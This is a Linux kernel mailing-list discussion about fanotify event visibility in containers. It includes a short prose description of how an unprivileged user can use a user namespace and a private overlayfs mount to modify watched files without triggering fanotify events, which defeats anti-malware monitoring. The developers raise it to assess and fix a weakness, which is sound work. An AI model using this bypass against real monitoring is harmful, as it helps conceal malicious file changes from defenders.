On Wed, May 12, 2021 at 03:34:15PM +0200, Jan Kara wrote: > On Wed 12-05-21 15:07:05, Christian Brauner wrote: > > On Mon, May 10, 2021 at 06:08:31PM +0300, Amir Goldstein wrote: > > > > > > OK, so this feature would effectively allow sb-wide watching of events that > > > > > > are generated from within the container (or its descendants). That sounds > > > > > > useful. Just one question: If there's some part of a filesystem, that is > > > > > > accesible by multiple containers (and thus multiple namespaces), or if > > > > > > there's some change done to the filesystem say by container management SW, > > > > > > then event for this change won't be visible inside the container (despite > > > > > > that the fs change itself will be visible). > > > > > > > > > > That is correct. > > > > > FYI, a privileged user can already mount an overlayfs in order to indirectly > > > > > open and write to a file. > > > > > > > > > > Because overlayfs opens the underlying file FMODE_NONOTIFY this will > > > > > hide OPEN/ACCESS/MODIFY/CLOSE events also for inode/sb marks. > > > > > Since 459c7c565ac3 ("ovl: unprivieged mounts"), so can unprivileged users. > > > > > > > > > > I wonder if that is a problem that we need to fix... > > > > > > > > I assume you are speaking of the filesystem that is absorbing the changes? > > > > AFAIU usually you are not supposed to access that filesystem alone but > > > > always access it only through overlayfs and in that case you won't see the > > > > problem? > > > > > > > > > > Yes I am talking about the "backend" store for overlayfs. > > > Normally, that would be a subtree where changes are not expected > > > except through overlayfs and indeed it is documented that: > > > "If the underlying filesystem is changed, the behavior of the overlay > > > is undefined, though it will not result in a crash or deadlock." > > > Not reporting events falls well under "undefined". > > > > > > But that is not the problem. > > > The problem is that if user A is watching a directory D for changes, then > > > an adversary user B which has read/write access to D can: > > > - Clone a userns wherein user B id is 0 > > > - Mount a private overlayfs instance using D as upperdir > > > - Open file in D indirectly via private overlayfs and edit it > > > > > > So it does not require any special privileges to circumvent generating > > > events. Unless I am missing something. > > > > No, I think you're right. That should work. I don't think that's > > necessarily a problem though. It's a bit unexpected and slightly > > unpleasant but it's documented already and it's not a security issue > > afaict. > > fanotify(7) is used in applications (such as virus scanners or anti-malware > products) where they expect to see all filesystem changes. There are > products which implement access mediation policy based on fanotify > permission events. So a way for unpriviledged application to escape > notification is a "security" issue (not a kernel one but it defeats > protections userspace implements). Ah, good point. I assumed since this has always been the case although restricted to privileged users on the host, i.e. creating an overlayfs mount would always have that affect iiuc.